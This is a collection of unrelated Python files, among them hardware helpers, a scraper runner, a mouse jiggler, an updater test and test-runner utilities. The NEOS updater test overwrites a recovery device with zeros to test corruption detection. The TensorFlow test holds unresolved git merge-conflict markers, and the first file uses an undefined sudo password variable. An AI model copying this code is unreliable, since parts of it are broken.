def __init__(self, profile_name: str, conn_type: str, connstring: str, testcase=None):
self.profile_name = profile_name
self.conn_type = conn_type
self.connstring = connstring
self.testcase = testcase
def make_profile(self):
"""
This method adds new connection profile or overwrites the old one, if it exists
"""
cmd = ['sudo', '-S', 'newtmgr', 'conn', 'add', self.profile_name,
'type=' + self.conn_type, 'connstring=' + self.connstring]
process = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = process.communicate(input=pwd.encode())[0].decode()
logging.debug(output)
ctrl = 'Connection profile ' + self.profile_name + ' successfully added'
if ctrl in output:
logging.debug('Connection profile added')
else:
logging.debug('Failed to add connection profile ')
def check_corefile(self):
"""
Check if corefile exists; if board is not responding, restart it and check again
"""
cmd = ['sudo', '-S', 'newtmgr', 'image', 'corelist', '-c', self.profile_name]
process = subprocess.Popen(cmd, shell=False,
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate(input=pwd.encode())[0].decode()
logging.debug(output)
# if process executed without errors, determine if corefile is present; print error otherwise
if output[1] == "":
if 'Corefile present' in output:
logging.debug('Board has crashed, corefile present')
self.download_and_delete_corefile()
elif 'No corefiles' in output:
logging.debug('No corefile; system didn\'t crashed or corefile not present')
else:
logging.debug('Board crashed; restarting...')
# restart board
restart = subprocess.check_output(['nrfjprog', '-r']).decode()
logging.debug(restart)
# retry corefile check after restart
self.check_corefile()
else:
logging.error(output[1].decode())
def download_and_delete_corefile(self):
if self.testcase:
filename = self.testcase + '.coredump'
else:
filename = 'default.coredump'
cmd = ['sudo', 'newtmgr', 'image', 'coredownload', filename, '-c', self.profile_name]
process = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = process.communicate(input=pwd.encode())[0].decode()
if 'Done writing core file' in output:
cmd = ['sudo', 'newtmgr', 'image', 'coreerase', '-c', self.profile_name]
process = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process.communicate(input=pwd.encode())[0].decode()
return 0
else:
logging.debug('Failed downloading corefile')
return 1
|
penv.py | from multiprocessing import Process, Pipe
import gym
def worker(conn, env):
while True:
cmd, data = conn.recv()
if cmd == "step":
maxsteps = 100
obs, reward, done, info = env.step(data)
info['obs'] = obs
if done or env.step_count>=maxsteps:
obs = env.reset()
conn.send((obs, reward, done, info))
elif cmd == "reset":
obs = env.reset()
conn.send(obs)
else:
raise NotImplementedError
class ParallelEnv(gym.Env):
"""A concurrent execution of environments in multiple processes."""
def __init__(self, envs):
assert len(envs) >= 1, "No environment given."
self.envs = envs
self.observation_space = self.envs[0].observation_space
self.action_space = self.envs[0].action_space
self.locals = []
for env in self.envs[1:]:
local, remote = Pipe()
self.locals.append(local)
p = Process(target=worker, args=(remote, env))
p.daemon = True
p.start()
remote.close()
def reset(self):
for local in self.locals:
local.send(("reset", None))
results = [self.envs[0].reset()] + [local.recv() for local in self.locals]
return results
def step(self, actions):
maxsteps = 100
for local, action in zip(self.locals, actions[1:]):
local.send(("step", action))
obs, reward, done, info = self.envs[0].step(actions[0])
info['obs'] = obs
if done or self.envs[0].step_count>=maxsteps:
obs = self.envs[0].reset()
results = zip(*[(obs, reward, done, info)] + [local.recv() for local in self.locals])
return results
def render(self):
raise NotImplementedError |
runScrape.py | #!flask/bin/python
if __name__ == "__main__":
import logSetup
import logging
logSetup.initLogging()
# logSetup.initLogging(logging.WARNING)
# Shut up fucking annoying psycopg2 vomit every exec.
import warnings
from sqlalchemy import exc as sa_exc
warnings.filterwarnings("ignore", category=UserWarning, module='psycopg2')
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
# This HAS to be included before the app, to prevent circular dependencies.
# import WebMirror.runtime_engines
import settings
import multiprocessing
import time
import json
import common.RunManager
import WebMirror.rules
import WebMirror.Runner
import WebMirror.UrlUpserter
import RawArchiver.RawRunner
import RawArchiver.RawUrlUpserter
import common.stuck
import common.process
import psutil
import Misc.ls_open_file_handles
import common.redis
import common.management.WebMirrorManage
from settings import NO_PROCESSES
from settings import RAW_NO_PROCESSES
from settings import MAX_DB_SESSIONS
import common.LogBase as LogBase
import common.StatsdMixin as StatsdMixin
class MemoryTracker(LogBase.LoggerMixin, StatsdMixin.InfluxDBMixin):
loggerPath = "Main.MemStats"
influxdb_type = "memory_stats"
influxdb_measurement_name = "server_ram_free"
def save_mem_stats(self):
v = psutil.virtual_memory()
params = {
'mem_total' : v.total,
'mem_available' : v.available,
'mem_percent' : v.percent,
'mem_used' : v.used,
'mem_free' : v.free,
'mem_active' : v.active,
'mem_inactive' : v.inactive,
'mem_buffers' : v.buffers,
'mem_cached' : v.cached,
'mem_shared' : v.shared,
'mem_slab' : v.slab,
}
self.log.info("Memory stats: %s", params)
points = [
{
'measurement' : self.influxdb_measurement_name,
"tags": {
'type' : self.influxdb_type,
},
'time' : int(time.time() * 1e9),
'fields' : params
}
]
self.influx_client.write_points(points)
def go(args):
largv = [tmp.lower() for tmp in args]
common.redis.config_redis()
rules = WebMirror.rules.load_rules()
lowrate = "lowrate" in largv
runner = common.RunManager.Crawler(
main_thread_count = NO_PROCESSES,
raw_thread_count = RAW_NO_PROCESSES,
lowrate = lowrate,
)
if "raw" in largv:
common.process.name_process("raw fetcher management thread")
print("RAW Scrape!")
RawArchiver.RawUrlUpserter.check_init_func()
if not "noreset" in largv:
print("Resetting any in-progress downloads.")
RawArchiver.RawUrlUpserter.resetRawInProgress()
else:
print("Not resetting in-progress downloads.")
RawArchiver.RawUrlUpserter.initializeRawStartUrls()
runner.run_raw()
else:
common.process.name_process("fetcher management thread")
if "noreset" not in largv and not lowrate:
print("Resetting any in-progress downloads.")
WebMirror.UrlUpserter.resetInProgress()
WebMirror.UrlUpserter.resetRedisQueues()
else:
print("Not resetting in-progress downloads.")
#if not "noreset" in largv:
# print("Dropping fetch priority levels.")
# common.management.WebMirrorManage.exposed_drop_priorities()
#else:
# print("Not resetting fetch priority levels.")
WebMirror.UrlUpserter.initializeStartUrls(rules)
runner.run()
print("Main runner returned!")
# print("Thread halted. App exiting.")
def dump_active_items():
print("Dumping active URLs")
active = {
'fetching' : [tmp.decode("utf-8") for tmp in common.redis.get_fetching_urls()],
'processing' : [tmp.decode("utf-8") for tmp in common.redis.get_processing_urls()],
}
with open("active_jobs_at_start_%s.json" % time.time(), "w") as fp:
json.dump(active, fp, sort_keys=True, indent=4)
common.redis.clear_fetching_urls()
common.redis.clear_processing_urls()
def run_in_subprocess():
if 'raw' not in sys.argv:
dump_active_items()
# mon = MemoryTracker()
proc = multiprocessing.Process(target=go, args=(sys.argv, ))
proc.start()
while proc.is_alive():
time.sleep(4)
# mon.save_mem_stats()
# print("Base Subprocessor Runner: %s, %s" % (proc.is_alive(), proc.pid))
print("Main runner has gone away. Committing Suicide")
# If the subprocess has gone away, die hard.
import ctypes
ctypes.string_at(1)
import os
os.kill(0,4)
if __name__ == "__main__":
import sys
largv = [tmp.lower() for tmp in sys.argv]
if "scheduler" in sys.argv:
print("Please use runScheduler.py instead!")
sys.exit(1)
else:
started = False
if not started:
started = True
run_in_subprocess()
|
MouseJiggle.py | import os, sys
import ctypes
import time
import multiprocessing
# # see http://msdn.microsoft.com/en-us/library/ms646260(VS.85).aspx for details
# ctypes.windll.user32.SetCursorPos(100, 20)
# ctypes.windll.user32.mouse_event(2, 0, 0, 0,0) # left down
# ctypes.windll.user32.mouse_event(4, 0, 0, 0,0) # left up
# Value Meaning
# MOUSEEVENTF_ABSOLUTE
# 0x8000
# The dx and dy parameters contain normalized absolute coordinates. If not set, those parameters contain relative data: the change in position since the last reported position. This flag can be set, or not set, regardless of what kind of mouse or mouse-like device, if any, is connected to the system. For further information about relative mouse motion, see the following Remarks section.
# MOUSEEVENTF_LEFTDOWN
# 0x0002
# The left button is down.
# MOUSEEVENTF_LEFTUP
# 0x0004
# The left button is up.
# MOUSEEVENTF_MIDDLEDOWN
# 0x0020
# The middle button is down.
# MOUSEEVENTF_MIDDLEUP
# 0x0040
# The middle button is up.
# MOUSEEVENTF_MOVE
# 0x0001
# Movement occurred.
# MOUSEEVENTF_RIGHTDOWN
# 0x0008
# The right button is down.
# MOUSEEVENTF_RIGHTUP
# 0x0010
# The right button is up.
# MOUSEEVENTF_WHEEL
# 0x0800
# The wheel has been moved, if the mouse has a wheel. The amount of movement is specified in dwData
# MOUSEEVENTF_XDOWN
# 0x0080
# An X button was pressed.
# MOUSEEVENTF_XUP
# 0x0100
# An X button was released.
# MOUSEEVENTF_WHEEL
# 0x0800
# The wheel button is rotated.
# MOUSEEVENTF_HWHEEL
# 0x01000
# The wheel button is tilted.
MOUSEEVENTF_MOVE = 0x0001 # mouse move
MOUSEEVENTF_LEFTDOWN = 0x0002 # left button down
MOUSEEVENTF_LEFTUP = 0x0004 # left button up
MOUSEEVENTF_RIGHTDOWN = 0x0008 # right button down
MOUSEEVENTF_RIGHTUP = 0x0010 # right button up
MOUSEEVENTF_MIDDLEDOWN = 0x0020 # middle button down
MOUSEEVENTF_MIDDLEUP = 0x0040 # middle button up
MOUSEEVENTF_WHEEL = 0x0800 # wheel button rolled
MOUSEEVENTF_ABSOLUTE = 0x8000 # absolute move
SM_CXSCREEN = 0
SM_CYSCREEN = 1
class POINT(ctypes.Structure):
_fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]
def MouseListener():
pos = POINT()
ctypes.windll.user32.GetCursorPos(ctypes.byref(pos))
x = pos.x
y = pos.y
while True:
time.sleep(10/1000)
ctypes.windll.user32.GetCursorPos(ctypes.byref(pos))
if x != pos.x or y != pos.y:
x, y = pos.x, pos.y
print(x,' , ', y)
pass
def main():
# p = multiprocessing.Process(target=MouseListener)
# p.start()
dx = 5
dy = -5
while True:
dx *= -1
dy *= -1
ctypes.windll.user32.mouse_event(MOUSEEVENTF_MOVE, dx, dy, 0, 0)
time.sleep(2)
# ctypes.windll.user32.keybd_event(0x31, 0, 0, 0) # Key Down
# ctypes.windll.user32.keybd_event(0x31, 0, 0x0002, 0) # Key Up
# p.join()
pass
if __name__ == "__main__":
main()
pass |
formula_lookup.py | import time
import search_engine.utils as utils
import multiprocessing
from search_engine import seq_list_numeric
from search_engine import seq_list
from .math_exp_eval_engine import NumericStringParser
"""
This file contains the implementations for formula lookup algorithm
"""
return_dic: dict
progress: multiprocessing.Value
lock: multiprocessing.Manager().Lock
_NUMBER_OF_THREADS = 8
def is_expression_correct(exp_input: str):
"""
A function to validate the syntax of the input that represents the terms formula lookup
exp_input: The terms lookup formula.
returns: True if the syntax is valid, False otherwise.
"""
try:
nsp = NumericStringParser()
# Parse terms and trim spaces
exp_input = exp_input.lower().split(',')
exp_input = list(map(lambda term_of_sequence: str(term_of_sequence).strip(), exp_input))
# Calculate and Compare
for i in range(len(exp_input)):
term = exp_input[i].replace('n', '1000')
x = nsp.eval(term)
return True
except:
return False
def formula_lookup_terms_by_terms(nsp: NumericStringParser, exp_input: list, sequence: list, n_index: int):
"""
This method will search about sequences using terms lookup formula (n -10, n, n * 10, n * 20)
nsp: Instance of NumericStringParser
exp_input: The terms lookup formula.
sequence: A sequence that must have the same length of terms as the terms lookup formula
n_index: The index of the term the represents n
returns: True if matched, False otherwise.
"""
n = sequence[n_index]
# Calculate and Compare
for i in range(len(exp_input)):
term = exp_input[i].replace('n', str(n))
if nsp.eval(term) != sequence[i]:
return False
return True
def parse_expression(exp_input: str):
exp_input = exp_input.lower().split(',')
exp_input = list(map(lambda x: str(x).strip(), exp_input))
return exp_input
def get_index_of_term_n(exp_input: list):
for i in range(len(exp_input)):
if exp_input[i] == 'n':
return i
def formula_lookup_linear_search(exp_input: str, range_list):
"""
This method will search about sequences using terms lookup formula (n -10, n, n * 10, n * 20)
exp_input: The terms lookup formula.
start_index: The start index of seq_list_numeric to begin the search with it. Included ---> [start_index, end_index)
end_index: The end index of seq_list_numeric to end the search with it. Not included ---> [start_index, end_index)
returns: A dictionary where the key represents the sequence and the value represents terms index where the
formula has matched.
"""
# Parse terms and trim spaces
global progress
global return_dic
global lock
if not ('lock' in vars() or 'lock' in globals()):
# Make it works without a direct call from formula_lookup
lock = multiprocessing.Manager().Lock()
progress = multiprocessing.Value('i', 0)
return_dic = multiprocessing.Manager().dict()
exp_input = parse_expression(exp_input)
n_index = get_index_of_term_n(exp_input)
number_of_terms = len(exp_input)
nsp = NumericStringParser()
# Iterate over sequences
for i in range_list:
seq = list(seq_list_numeric[i])
with lock:
progress.value += 1
# Iterate over terms one by one
for d in range(len(seq) - number_of_terms):
seq_cut = seq[d:(d + number_of_terms)]
if formula_lookup_terms_by_terms(nsp, exp_input, seq_cut, n_index):
return_dic[seq_list[i]] = d
break
return return_dic
def range_split(range_to_split, number_of_groups):
k, m = divmod(len(range_to_split), number_of_groups)
return (range_to_split[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(number_of_groups))
def formula_lookup(exp_input: str):
"""
This method will search about sequences using terms lookup formula (n -10, n, n * 10, n * 20)
exp_input: The terms lookup formula.
returns: A dictionary where the key represents the sequence and the value represents terms index where the
formula has matched.
"""
global return_dic
global progress
global lock
lock = multiprocessing.Manager().Lock()
progress = multiprocessing.Value('i', 0)
return_dic = multiprocessing.Manager().dict()
if not is_expression_correct(exp_input):
raise ValueError("The expression syntax is wrong!")
# Divide Range
process_list = []
number_of_sequences = len(seq_list_numeric)
indices_range = list(range_split(range(number_of_sequences), _NUMBER_OF_THREADS))
# Start Processes
for i in range(_NUMBER_OF_THREADS):
proc = multiprocessing.Process(target=formula_lookup_linear_search, args=(exp_input, indices_range[i]))
proc.start()
process_list.append(proc)
# Wait and Echo
index = 0
while progress.value != number_of_sequences:
utils.waiting_with_index(index, progress.value, number_of_sequences)
index += 1
time.sleep(0.25)
print("")
# Join
for process in process_list:
process.join()
# Return
return return_dic
|
file_monitor.py |
import threading
import pyinotify
import logging
import atexit
from abc import abstractmethod
from pytos.common.logging.definitions import COMMON_LOGGER_NAME
logger = logging.getLogger(COMMON_LOGGER_NAME)
class ModifiedFileEventHandler(pyinotify.ProcessEvent):
def my_init(self, callback=None):
self._callback = callback
def process_IN_CLOSE_WRITE(self, event):
self._callback()
def process_IN_MODIFY(self, event):
self._callback()
class FileMonitor:
FILE_CHANGE_MASK = pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MODIFY
def __init__(self, file_paths, watch_mask=FILE_CHANGE_MASK):
self.inotify_watch_manager = pyinotify.WatchManager()
self._file_paths = file_paths
self._event_handler = ModifiedFileEventHandler(callback=self._reload_modified_file)
self._inotify_notifier = pyinotify.Notifier(self.inotify_watch_manager, default_proc_fun=self._event_handler)
self._loop_thread = threading.Thread(target=self._inotify_notifier.loop, daemon=True)
for file_path in self._file_paths:
self.inotify_watch_manager.add_watch(file_path, watch_mask)
self._loop_thread.start()
atexit.register(self._shutdown)
def _shutdown(self):
for watch in self.inotify_watch_manager.watches.copy():
self.inotify_watch_manager.del_watch(watch)
self._inotify_notifier.stop()
self._loop_thread.join(0.1)
def __del__(self):
self._shutdown()
@abstractmethod
def _reload_modified_file(self, *args, **kwargs):
raise NotImplementedError
|
test_neos_updater.py | #!/usr/bin/env python3
import hashlib
import http.server
import json
import os
import unittest
import random
import requests
import shutil
import socketserver
import tempfile
import multiprocessing
from pathlib import Path
from selfdrive.hardware.eon.neos import RECOVERY_DEV, NEOSUPDATE_DIR, get_fn, download_file, \
verify_update_ready, download_neos_update
EON_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)))
MANIFEST = os.path.join(EON_DIR, "neos.json")
PORT = 8000
def server_thread(port):
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", port), http.server.SimpleHTTPRequestHandler)
httpd.serve_forever()
class TestNeosUpdater(unittest.TestCase):
@classmethod
def setUpClass(cls):
# generate a fake manifest
cls.manifest = {}
for i in ('ota', 'recovery'):
with tempfile.NamedTemporaryFile(delete=False, dir=os.getcwd()) as f:
dat = os.urandom(random.randint(1000, 100000))
f.write(dat)
cls.manifest[f"{i}_url"] = f"http://localhost:{PORT}/" + os.path.relpath(f.name)
cls.manifest[F"{i}_hash"] = hashlib.sha256(dat).hexdigest()
if i == "recovery":
cls.manifest["recovery_len"] = len(dat)
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
f.write(json.dumps(cls.manifest))
cls.fake_manifest = f.name
@classmethod
def tearDownClass(cls):
os.unlink(cls.fake_manifest)
os.unlink(os.path.basename(cls.manifest['ota_url']))
os.unlink(os.path.basename(cls.manifest['recovery_url']))
def setUp(self):
# server for update files
self.server = multiprocessing.Process(target=server_thread, args=(PORT, ))
self.server.start()
# clean up
if os.path.exists(NEOSUPDATE_DIR):
shutil.rmtree(NEOSUPDATE_DIR)
def tearDown(self):
self.server.kill()
self.server.join(1)
def _corrupt_recovery(self):
with open(RECOVERY_DEV, "wb") as f:
f.write(b'\x00'*100)
def test_manifest(self):
with open(MANIFEST) as f:
m = json.load(f)
assert m['ota_hash'] in m['ota_url']
assert m['recovery_hash'] in m['recovery_url']
assert m['recovery_len'] > 0
for url in (m['ota_url'], m['recovery_url']):
r = requests.head(m['recovery_url'])
r.raise_for_status()
self.assertEqual(r.headers['Content-Type'], "application/octet-stream")
if url == m['recovery_url']:
self.assertEqual(int(r.headers['Content-Length']), m['recovery_len'])
def test_download_hash_check(self):
os.makedirs(NEOSUPDATE_DIR, exist_ok=True)
Path(get_fn(self.manifest['ota_url'])).touch()
with self.assertRaisesRegex(Exception, "failed hash check"):
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash']+'a', "system")
# should've unlinked after the failed hash check, should succeed now
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash'], "system")
# TODO: needs an http server that supports Content-Range
#def test_download_resume(self):
# os.makedirs(NEOSUPDATE_DIR, exist_ok=True)
# with open(os.path.basename(self.manifest['ota_url']), "rb") as src, \
# open(get_fn(self.manifest['ota_url']), "wb") as dest:
# l = dest.write(src.read(8192))
# assert l == 8192
# download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
# self.manifest['ota_hash'], "system")
def test_download_no_internet(self):
self.server.kill()
os.makedirs(NEOSUPDATE_DIR, exist_ok=True)
# fail, no internet
with self.assertRaises(requests.exceptions.ConnectionError):
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash'], "system")
# already cached, ensure we don't hit the server
shutil.copyfile(os.path.basename(self.manifest['ota_url']), get_fn(self.manifest['ota_url']))
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash'], "system")
def test_download_update(self):
download_neos_update(self.fake_manifest)
self.assertTrue(verify_update_ready(self.fake_manifest))
def test_verify_update(self):
# good state
download_neos_update(self.fake_manifest)
self.assertTrue(verify_update_ready(self.fake_manifest))
# corrupt recovery
self._corrupt_recovery()
self.assertFalse(verify_update_ready(self.fake_manifest))
# back to good state
download_neos_update(self.fake_manifest)
self.assertTrue(verify_update_ready(self.fake_manifest))
# corrupt ota
self._corrupt_recovery()
with open(os.path.join(NEOSUPDATE_DIR, os.path.basename(self.manifest['ota_url'])), "ab") as f:
f.write(b'\x00')
self.assertFalse(verify_update_ready(self.fake_manifest))
if __name__ == "__main__":
unittest.main()
|
pcap_subscriber.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import asyncio
import socket
import threading
from fboss.thrift_clients import PcapPushSubClient
from neteng.fboss.asyncio.pcap_pubsub import PcapSubscriber as ThriftSub
from thrift.server import TAsyncioServer
class PcapSubscriber(ThriftSub.Iface):
def __init__(self, port):
self.hostname = socket.gethostname()
self.port = port
def subscribe(self, pub_hostname):
# setup client
self._client = PcapPushSubClient(pub_hostname)
self._client.subscribe(self.hostname, self.port)
def unsubscribe(self):
self._client.unsubscribe(self.hostname, self.port)
# inherit this class and override the on receive functions
# additionally, these functions need to be thread-safe
class PcapListener():
def __init__(self, sub):
self.subscriber = sub
def thread_work(self):
self.loop = asyncio.new_event_loop()
self.server = self.loop.run_until_complete(
TAsyncioServer.ThriftAsyncServerFactory(
self.subscriber, port=self.subscriber.port, loop=self.loop
)
)
self.subscriber.subscribe(self.remote)
self.loop.run_forever()
def open_connection(self, remote_host):
self.remote = remote_host
self.server_thread = threading.Thread(target=self.thread_work, args=())
self.server_thread.daemon = True
self.server_thread.start()
|
common.py | #
# Phoenix-RTOS test runner
#
# Common parts of phoenix-rtos test runners
#
# Copyright 2021 Phoenix SYstems
# Authors: Jakub Sarzyński, Mateusz Niewiadomski, Damian Loewnau
#
import importlib
import logging
import os
import signal
import sys
import threading
import time
from abc import ABC, abstractmethod
from pathlib import Path
import subprocess
import pexpect
import pexpect.fdpexpect
import serial
from trunner.config import PHRTOS_PROJECT_DIR
from trunner.tools.color import Color
_BOOT_DIR = PHRTOS_PROJECT_DIR / '_boot'
def rootfs(target: str) -> Path:
return PHRTOS_PROJECT_DIR / '_fs' / target / 'root'
def is_github_actions():
return os.getenv('GITHUB_ACTIONS', False)
def wait_for_dev(port, timeout=0):
asleep = 0
# naive wait for dev
while not os.path.exists(port):
time.sleep(0.01)
asleep += 0.01
if timeout and asleep >= timeout:
raise TimeoutError
def power_usb_ports(enable: bool):
uhubctl = subprocess.run([
'uhubctl',
'-l', '2',
'-a', f'{1 if enable else 0}'],
stdout=subprocess.DEVNULL
)
if uhubctl.returncode != 0:
logging.error('uhubctl failed!\n')
raise Exception('RPi usb ports powering up/down failed!')
def unbind_rpi_usb(port_address):
try:
with open('/sys/bus/usb/drivers/usb/unbind', 'w') as file:
file.write(port_address)
except PermissionError:
logging.error("/sys/bus/usb/drivers/usb/unbind: PermissionError\n\
If You launch test runner locally:\n\
Add 'sudo chmod a+w /sys/bus/usb/drivers/usb/unbind' to /etc/rc.local\n\
If You use Docker:\n\
Set the appropriate permissions\n")
sys.exit(1)
class Psu:
"""Wrapper for psu program"""
def __init__(self, script, cwd=_BOOT_DIR):
self.script = script
self.cwd = cwd
self.proc = None
def read_output(self):
if is_github_actions():
logging.info('::group::Run psu\n')
while True:
line = self.proc.readline()
if not line:
break
logging.info(line)
if is_github_actions():
logging.info('::endgroup::\n')
def run(self):
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'psu',
[f'{self.script}'],
cwd=self.cwd,
encoding='utf-8'
)
self.read_output()
self.proc.wait()
if self.proc.exitstatus != 0:
logging.error('psu failed!\n')
raise Exception('Flashing failed!')
def phd_error_msg(message, output):
msg = message
msg += Color.colorify('\nPHOENIXD OUTPUT:\n', Color.BOLD)
msg += output
return msg
class PhoenixdError(Exception):
pass
class Phoenixd:
""" Wrapper for phoenixd program"""
def __init__(
self,
port,
baudrate=460800,
dir='.',
cwd=_BOOT_DIR,
wait_dispatcher=True
):
self.port = port
self.baudrate = baudrate
self.dir = dir
self.cwd = cwd
self.proc = None
self.reader_thread = None
self.wait_dispatcher = wait_dispatcher
self.dispatcher_event = None
self.output_buffer = ''
def _reader(self):
""" This method is intended to be run as a separated thread. It reads output of proc
line by line and saves it in the output_buffer. Additionally, if wait_dispatcher is true,
it searches for a line stating that message dispatcher has started """
while True:
line = self.proc.readline()
if not line:
break
if self.wait_dispatcher and not self.dispatcher_event.is_set():
msg = f'Starting message dispatcher on [{self.port}] (speed={self.baudrate})'
if msg in line:
self.dispatcher_event.set()
self.output_buffer += line
def run(self):
try:
wait_for_dev(self.port, timeout=10)
except TimeoutError as exc:
raise PhoenixdError(f'couldn\'t find {self.port}') from exc
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'phoenixd',
['-p', self.port,
'-b', str(self.baudrate),
'-s', self.dir],
cwd=self.cwd,
encoding='utf-8'
)
self.dispatcher_event = threading.Event()
self.reader_thread = threading.Thread(target=self._reader)
self.reader_thread.start()
if self.wait_dispatcher:
# Reader thread will notify us that message dispatcher has just started
dispatcher_ready = self.dispatcher_event.wait(timeout=5)
if not dispatcher_ready:
self.kill()
msg = 'message dispatcher did not start!'
raise PhoenixdError(msg)
return self.proc
def output(self):
output = self.output_buffer
if is_github_actions():
output = '::group::phoenixd output\n' + output + '\n::endgroup::\n'
return output
def kill(self):
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)
self.reader_thread.join(timeout=10)
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGKILL)
def __enter__(self):
self.run()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.kill()
class PloError(Exception):
def __init__(self, message, expected):
msg = Color.colorify("PLO ERROR:\n", Color.BOLD)
msg += str(message) + '\n'
if expected:
msg += Color.colorify("EXPECTED:\n", Color.BOLD)
msg += str(expected) + '\n'
super().__init__(msg)
class PloTalker:
"""Interface to communicate with plo"""
def __init__(self, port, baudrate=115200):
self.port = port
self.baudrate = baudrate
self.serial = None
self.plo = None
@classmethod
def from_pexpect(cls, pexpect_fd):
""" PloTalker can be created by passing pexpect spawn object directly.
User should handle port and process by himself. """
obj = cls(port=None)
obj.plo = pexpect_fd
return obj
def open(self):
try:
self.serial = serial.Serial(self.port, baudrate=self.baudrate)
except serial.SerialException:
logging.error(f'Port {self.port} not available\n')
raise
try:
self.plo = pexpect.fdpexpect.fdspawn(self.serial, timeout=8)
except Exception:
self.serial.close()
raise
return self
def close(self):
self.serial.close()
def __enter__(self):
return self.open()
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def wait_prompt(self, timeout=8):
self.plo.expect_exact("(plo)% ", timeout=timeout)
def expect_prompt(self, timeout=8):
idx = self.plo.expect([r"\(plo\)% ", r"(.*?)\n"], timeout=timeout)
if idx == 1:
# Something else than prompt was printed, raise error
line = self.plo.match.group(0)
raise PloError(line, expected="(plo)% ")
def cmd(self, cmd, timeout=8):
self.plo.send(cmd + '\r\n')
# Wait for an eoched command
self.plo.expect_exact(cmd)
# There might be some ASCII escape characters, we wait only for a new line
self.plo.expect_exact('\n', timeout=timeout)
def app(self, device, file, imap, dmap, exec=False):
exec = '-x' if exec else ''
self.cmd(f'app {device} {exec} {file} {imap} {dmap}', timeout=30)
self.expect_prompt()
def copy(self, src, src_obj, dst, dst_obj, src_size='', dst_size=''):
self.cmd(f'copy {src} {src_obj} {src_size} {dst} {dst_obj} {dst_size}', timeout=60)
self.expect_prompt()
def copy_file2mem(self, src, file, dst='flash1', off=0, size=0):
self.copy(
src=src,
src_obj=file,
dst=dst,
dst_obj=off,
dst_size=size
)
def go(self):
self.plo.send('go!\r\n')
class Runner(ABC):
"""Common interface for test runners"""
BUSY = 'BUSY'
SUCCESS = 'SUCCESS'
FAIL = 'FAIL'
def __init__(self):
# Busy status is set from the start to the end of the specified runner's run
self.status = Runner.BUSY
self.set_status(self.status)
def set_status(self, status):
"""Method for sygnalising a current runner status: busy/failed/succeeded"""
# for now, not used in all target runners
self.status = status
@abstractmethod
def flash(self):
"""Method used for flashing a device with the image containing tests."""
pass
@abstractmethod
def run(self, test):
"""Method used for running a single test case which is represented by TestCase class."""
pass
class DeviceRunner(Runner):
"""This class provides interface to run tests on hardware targets using serial port"""
def __init__(self, serial):
super().__init__()
self.serial_port = serial[0]
self.serial_baudrate = serial[1]
self.serial = None
def run(self, test):
if test.skipped():
return
try:
self.serial = serial.Serial(self.serial_port, baudrate=self.serial_baudrate)
except serial.SerialException:
test.handle_exception()
return
proc = pexpect.fdpexpect.fdspawn(self.serial, encoding='utf-8', timeout=test.timeout)
try:
PloTalker.from_pexpect(proc).go()
test.handle(proc)
finally:
self.serial.close()
class GPIO:
"""Wrapper around the RPi.GPIO module. It represents a single OUT pin"""
def __init__(self, pin, init=0):
self.pin = pin
self.gpio = importlib.import_module('RPi.GPIO')
self.gpio.setmode(self.gpio.BCM)
self.gpio.setwarnings(False)
if init == 0:
self.gpio.setup(self.pin, self.gpio.OUT, initial=self.gpio.LOW)
else:
self.gpio.setup(self.pin, self.gpio.OUT, initial=self.gpio.HIGH)
def high(self):
self.gpio.output(self.pin, self.gpio.HIGH)
def low(self):
self.gpio.output(self.pin, self.gpio.LOW)
|
dense_update_ops_no_tsan_test.py | <<<<<<< HEAD
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
=======
"""Tests for state updating ops that may have benign race conditions."""
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class AssignOpTest(tf.test.TestCase):
>>>>>>> f41959ccb2... TensorFlow: Initial commit of TensorFlow library.
# NOTE(mrry): We exclude thess tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
<<<<<<< HEAD
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
